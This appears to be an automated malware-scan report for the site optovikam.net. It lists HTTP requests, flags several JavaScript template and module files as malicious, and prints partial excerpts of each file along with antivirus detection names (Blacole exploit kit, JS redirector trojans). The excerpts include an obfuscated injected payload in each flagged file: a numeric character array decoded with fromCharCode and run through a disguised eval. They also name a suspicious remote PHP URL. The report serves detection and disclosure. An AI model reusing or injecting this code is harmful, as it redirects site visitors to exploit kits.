Request | Server response | Status |
http://www.optovikam.net/ | 200 OK Content-Length: 69801 Content-Type: text/html | clean |
http://www.optovikam.net/templates/7/warp/js/warp.js | 200 OK Content-Length: 18188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Warp={};Warp.Base={matchHeight:function(e,d){var c=0,b=document.getElements(e);b.each(function(a){c=Math.max(c,a.getSize().y)});if(d)c=Math.max(c,d);b.each(function(a){var i=a.getStyle("padding-top").toInt()+a.getStyle("padding-bottom").toInt()+a.getStyle("border-top-width").toInt()+a.getStyle("border-bottom-width").toInt();a.setStyle(window.ie6?"height":"min-height",c-i+"px")})}}; Warp.Morph=new Class({Implements:Options,initialize:function(e,d,c,b,a,i){this.setOptions({duration:500,tra
... 3025 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- JS/Dldr.Agent.AY.1
- Avast
- JS:Redirector-UC [Trj]
- Ad-Aware
- Trojan.JS.Agent.FPX
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.PhoexRef.a!1609327
- nProtect
- Trojan.JS.Agent.FPX
- K7AntiVirus
- Exploit ( 04c556871 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0403
- Emsisoft
- Trojan.JS.Agent.FPX (B)
- Comodo
- TrojWare.JS.Agent.HJ
- K7GW
- Exploit ( 04c556871 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.bm
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Trojan:JS/Redirector.JN
- Kaspersky
- Trojan-Downloader.JS.Agent.gpp
- MicroWorld-eScan
- Trojan.JS.Agent.FPX
- Fortinet
- JS/Obfuscus.AACA!tr
- TotalDefense
- JS/BlacoleRef.M
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.bm
- NANO-Antivirus
- Trojan.Script.Agent.rrcam
- ClamAV
- JS.Trojan.Agent-13
- F-Secure
- Trojan.JS.Agent.FPX
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Crypted.Y
- AVG
- Script/Exploit.Kit
- Norman
- Exploit.AJN
- Sophos
- Troj/PhoexRef-A
- GData
- Trojan.JS.Agent.FPX
- Symantec
- Trojan.Malscript
- Commtouch
- JS/Crypted.Y
- ESET-NOD32
- JS/Agent.NEN
- BitDefender
- Trojan.JS.Agent.FPX
|
http://www.optovikam.net/templates/7/warp/js/accordionmenu.js | 200 OK Content-Length: 18396 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Warp.AccordionMenu=new Class({Implements:Options,initialize:function(a,c,d){this.setOptions({accordion:"default",onActive:function(b){b.addClass("active");b.getFirst().addClass("active")},onBackground:function(b){b.removeClass("active");b.getFirst().removeClass("active")}},d);this.togs=a;this.elms=c;switch(this.options.accordion){case "slide":this.createSlide();break;default:this.createDefault()}},createDefault:function(){var a={};if(!$defined(this.options.display)&&!$defined(this.option
... 3028 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;694!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- JS/Redirector.JN.12
- Avast
- JS:Redirector-UC [Trj]
- Ad-Aware
- Trojan.JS.Agent.FPX
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.PhoexRef.a!1609327
- nProtect
- Trojan.JS.Agent.FPX
- K7AntiVirus
- Exploit ( 04c55caf1 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0403
- Emsisoft
- Trojan.JS.Agent.FPX (B)
- Comodo
- TrojWare.JS.Agent.HJ
- K7GW
- Exploit ( 04c55caf1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.bm
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Trojan:JS/Redirector.JN
- Kaspersky
- Trojan-Downloader.JS.Agent.gpp
- MicroWorld-eScan
- Trojan.JS.Agent.FPX
- TotalDefense
- JS/BlacoleRef.M
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.bm
- NANO-Antivirus
- Trojan.Script.Agent.rrcam
- ClamAV
- JS.Trojan.Agent-13
- F-Secure
- Trojan.JS.Agent.FPX
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Crypted.Y
- AVG
- Script/Exploit.Kit
- Norman
- Exploit.AJN
- Sophos
- Troj/PhoexRef-A
- GData
- Trojan.JS.Agent.FPX
- Symantec
- Trojan.Malscript
- Commtouch
- JS/Crypted.Y
- BitDefender
- Trojan.JS.Agent.FPX
|
http://www.optovikam.net/templates/7/js/menu.js | 200 OK Content-Length: 18201 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Warp.Menu=new Class({initialize:function(f,g){this.setOptions({mode:"default",duration:600,transition:Fx.Transitions.linear,wait:false},g);var b={width:0,height:0,opacity:0};switch(this.options.mode){case "width":b={width:0,opacity:0};break;case "height":b={height:0,opacity:0};break}$$(f).each(function(c){var a=c.getElement("ul");if(a){var d=new Fx.Styles(a,this.options),h=a.getStyles("width","height","opacity");a.setStyles(b);c.addEvents({mouseenter:function(){var e=c.getParent();e.getStyle("ov
... 3030 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- JS/Redirector.AJ.41
- Avast
- JS:Redirector-UC [Trj]
- Ad-Aware
- Trojan.JS.Agent.FPX
- Ikarus
- Trojan.JS.Redirector
- Rising
- JS:Trojan.Script.JS.PhoexRef.a!1609327
- nProtect
- Trojan.JS.Agent.FPX
- K7AntiVirus
- Exploit ( 04c55caf1 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0403
- Emsisoft
- Trojan.JS.Agent.FPX (B)
- Comodo
- TrojWare.JS.Agent.HJ
- K7GW
- Exploit ( 04c55caf1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.bm
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Trojan:JS/Redirector.JN
- Kaspersky
- Trojan-Downloader.JS.Agent.gpp
- MicroWorld-eScan
- Trojan.JS.Agent.FPX
- TotalDefense
- JS/BlacoleRef.M
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.bm
- NANO-Antivirus
- Trojan.Script.Agent.rrcam
- ClamAV
- JS.Trojan.Agent-13
- F-Secure
- Trojan.JS.Agent.FPX
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Crypted.Y
- AVG
- Script/Exploit.Kit
- Norman
- Exploit.AJN
- Sophos
- Troj/PhoexRef-A
- GData
- Trojan.JS.Agent.FPX
- Symantec
- Trojan.Malscript
- Commtouch
- JS/Crypted.Y
- BitDefender
- Trojan.JS.Agent.FPX
|
http://www.optovikam.net/templates/7/js/fancymenu.js | 200 OK Content-Length: 20378 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Warp.FancyMenu=new Class({initialize:function(b,a){this.setOptions({transition:Fx.Transitions.sineInOut,duration:500,wait:false,onClick:Class.empty,opacity:1,mode:"move",slideOffset:30,colorSelector:["red","pink","blue","green","orange","yellow","lilac","turquoise"],itemSelector:"li.level1",activeSelector:"li.active"},a);this.menu=$(b);this.current=this.menu.getElement(this.options.activeSelector);this.li=[];this.div=[];this.menu.getElements(this.options.itemSelector).each(function(c,e){this.cre
... 3020 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- JS/Redirector.AJ.41
- Avast
- JS:Redirector-UC [Trj]
- Ad-Aware
- Trojan.JS.Agent.FPX
- Ikarus
- Trojan.JS.Redirector
- Rising
- JS:Trojan.Script.JS.PhoexRef.a!1609327
- nProtect
- Trojan.JS.Agent.FPX
- K7AntiVirus
- Exploit ( 04c55caf1 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0403
- Emsisoft
- Trojan.JS.Agent.FPX (B)
- Comodo
- TrojWare.JS.Agent.HJ
- K7GW
- Exploit ( 04c55caf1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.bm
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Trojan:JS/Redirector.JN
- Kaspersky
- Trojan-Downloader.JS.Agent.gpp
- MicroWorld-eScan
- Trojan.JS.Agent.FPX
- Fortinet
- JS/Obfuscus.AACA!tr
- TotalDefense
- JS/BlacoleRef.M
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.bm
- NANO-Antivirus
- Trojan.Script.Agent.rrcam
- ClamAV
- JS.Trojan.Agent-13
- F-Secure
- Trojan.JS.Agent.FPX
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Crypted.Y
- AVG
- Script/Exploit.Kit
- Norman
- Exploit.AJN
- Sophos
- Troj/PhoexRef-A
- GData
- Trojan.JS.Agent.FPX
- Symantec
- Trojan.Malscript
- Commtouch
- JS/Crypted.Y
- BitDefender
- Trojan.JS.Agent.FPX
|
http://www.optovikam.net/templates/7/js/template.js | 200 OK Content-Length: 19586 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var WarpTemplate = { start: function() { new Warp.AccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); new Warp.FancyMenu($E('ul', 'menu'), { mode: 'move', transition: Fx.Transitions.Expo.easeOut, duration: 700 }); if(!window.ie6 && !window.ie7) { new Warp.Menu('div#menu li.parent', { mode: 'height', transition: Fx.Transitions.Expo.easeOut }); } var enterColor =
... 3232 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;696!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- JS/ScrInj.P
- Avast
- JS:Redirector-UC [Trj]
- Ad-Aware
- Trojan.JS.Agent.FPX
- Ikarus
- Trojan.JS.Obfuscator
- Rising
- JS:Trojan.Script.JS.PhoexRef.a!1609327
- nProtect
- Trojan.JS.Agent.FPX
- K7AntiVirus
- Exploit ( 04c559dd1 )
- Emsisoft
- Trojan.JS.Agent.FPX (B)
- Comodo
- TrojWare.JS.Agent.FV
- K7GW
- Exploit ( 04c559dd1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.bm
- DrWeb
- JS.IFrame.233
- TrendMicro
- JS_IFRAME.BXV
- Microsoft
- VirTool:JS/Obfuscator.DL
- Kaspersky
- Trojan-Downloader.JS.Agent.gpp
- MicroWorld-eScan
- Trojan.JS.Agent.FPX
- Fortinet
- JS/Obfuscus.AACA!tr
- TotalDefense
- JS/BlacoleRef.M
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.bm
- NANO-Antivirus
- Trojan.Script.Agent.rrcam
- ClamAV
- JS.Trojan.Agent-13
- F-Secure
- Trojan.JS.Agent.FPX
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Crypted.Y
- AVG
- Script/Exploit.Kit
- Norman
- Exploit.AJN
- Sophos
- Troj/PhoexRef-A
- GData
- Trojan.JS.Agent.FPX
- Symantec
- Trojan.Malscript
- Commtouch
- JS/Crypted.Y
- ESET-NOD32
- JS/Agent.NEN
- BitDefender
- Trojan.JS.Agent.FPX
|
http://www.optovikam.net/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 33353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1B=2 1E({1v:5(t,4){1.1w({1h:\'c...\',16:\'Y\',13:\'1U.1V\',18:\'1T.c-9\',17:\'h.f\',1j:\'15 e\',1g:\'15 A\',1m:\'1P e 1Q\',1G:\'1R e\',m:\'1W.1X?22=23&21=20&a
... 3039 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;692!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- JS/ScrInj.P
- Avast
- JS:Redirector-UC [Trj]
- Ad-Aware
- Trojan.JS.Agent.FPX
- Ikarus
- Trojan.JS.Agent
- nProtect
- Trojan.JS.Agent.FPX
- K7AntiVirus
- Exploit ( 04c559dd1 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V0403
- Emsisoft
- Trojan.JS.Agent.FPX (B)
- Comodo
- TrojWare.JS.Agent.FV
- K7GW
- Exploit ( 04c559dd1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.bm
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- VirTool:JS/Obfuscator.DL
- Kaspersky
- Trojan-Downloader.JS.Agent.gpp
- MicroWorld-eScan
- Trojan.JS.Agent.FPX
- Fortinet
- JS/Obfuscus.AACA!tr
- TotalDefense
- JS/BlacoleRef.M
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.bm
- NANO-Antivirus
- Trojan.Script.Agent.rrcam
- ClamAV
- JS.Trojan.Agent-13
- F-Secure
- Trojan.JS.Agent.FPX
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Crypted.Y
- AVG
- Script/Exploit.Kit
- Norman
- Exploit.AJN
- Sophos
- Troj/PhoexRef-A
- GData
- Trojan.JS.Agent.FPX
- Symantec
- Trojan.Malscript
- Commtouch
- JS/Crypted.Y
- ESET-NOD32
- JS/Agent.NEN
- BitDefender
- Trojan.JS.Agent.FPX
|
http://www.optovikam.net/modules/mod_sobi2menu/mod_sobi2dtree.js | 200 OK Content-Length: 42083 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Node(id, pid, name, url, title, target, icon, iconOpen, open) { this.id = id; this.pid = pid; this.name = name; this.url = url; this.title = title; this.target = target; this.icon = icon; this.iconOpen = iconOpen; this._io = open || false; this._is = false; this._ls = false; this._hc = false; this._ai = 0; this._p; }; function dTree(objName) { this.config = { target : null, folderLinks :
... 3250 bytes are skipped ...-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;696!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-NS [Trj]
- Ikarus
- Trojan.JS.Redirector
- TrendMicro-HouseCall
- TROJ_GEN.F47V0403
- DrWeb
- JS.IFrame.233
- Microsoft
- Trojan:JS/Redirector.LD
- NANO-Antivirus
- Trojan.Script.Blacole.tfthc
- F-Prot
- JS/Redir.NZ
- Commtouch
- JS/Redir.NZ
|
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://rmv-elektronik.de/cruzmorlock/tragral/wp-includes/js/tinymce/plugins/wordpress/img/RBACPsBh.php?id= | 403 Forbidden Content-Length: 346 Content-Type: text/html | clean |
http://rmv-elektronik.de/test404page.js | 403 Forbidden Content-Length: 283 Content-Type: text/html | clean |